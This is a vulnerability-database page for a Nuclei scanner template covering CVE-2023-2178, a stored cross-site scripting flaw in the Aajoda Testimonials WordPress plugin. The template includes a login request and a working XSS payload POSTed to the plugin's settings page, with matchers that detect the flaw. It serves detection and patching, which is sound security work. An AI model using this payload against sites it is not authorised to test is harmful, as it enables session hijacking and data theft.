Lucene search
ProjectDiscoveryNUCLEI:CVE-2023-2178HistoryJul 25, 2023 - 5:58 a.m.
Aajoda Testimonials < 2.2.2 - Cross-Site Scripting
2023-07-2505:58:16
ProjectDiscovery
github.com
6
aajoda testimonials
cross-site scripting
high-privilege
admin
stored xss
web pages
data theft
session hijacking
website defacement
vulnerability
update
wordpress plugin
cve-2023-2178
wpscan
4.8 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
0.001 Low
EPSS
Percentile
40.2%
The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
id: CVE-2023-2178
info:
name: Aajoda Testimonials < 2.2.2 - Cross-Site Scripting
author: Farish
severity: medium
description: |
The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: |
Update Aajoda Testimonials plugin to version 2.2.2 or later to mitigate the vulnerability.
reference:
- https://wpscan.com/vulnerability/e84b71f9-4208-4efb-90e8-1c778e7d2ebb
- https://downloads.wordpress.org/plugin/aajoda-testimonials.2.1.0.zip
- https://nvd.nist.gov/vuln/detail/CVE-2023-2178
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cve-id: CVE-2023-2178
cwe-id: CWE-79
epss-score: 0.00078
epss-percentile: 0.33655
cpe: cpe:2.3:a:aajoda:aajoda_testimonials:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: aajoda
product: aajoda_testimonials
framework: wordpress
tags: cve2023,cve,wpscan,wordpress,wp,wp-plugin,xss,authenticated,aajoda
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
aajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
- 'contains(body_2, "></textarea><script>alert(document.domain)</script>")'
- 'contains(body_2, "page_aajoda-testimonials")'
condition: and
# digest: 4b0a00483046022100a8e5a63e79c6b4ec11e580b7171aeb1565b9cea7a93e3f3b319c86f146b988f4022100837c8e9be1ea6bfa4b45912eb8c52e27444309294181ba829334a2b88b5e84cb:922c64590222798bb761d5b6d8e72950Related
cvelist
cvelist
CVE-2023-2178 Aajoda Testimonials < 2.2.2 - Admin+ Stored XSS
2023-06-27 13:17:09
cve
cve
CVE-2023-2178
2023-06-27 14:15:10
nvd
nvd
CVE-2023-2178
2023-06-27 14:15:10
wpvulndb
wpvulndb
Aajoda Testimonials < 2.2.2 - Admin+ Stored XSS
2023-06-05 00:00:00
prion
prion
Cross site scripting
2023-06-27 14:15:00
wpexploit
wpexploit
Aajoda Testimonials < 2.2.2 - Admin+ Stored XSS
2023-06-05 00:00:00
wordfence
wordfence
4.8 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
0.001 Low
EPSS
Percentile
40.2%
Related for NUCLEI:CVE-2023-2178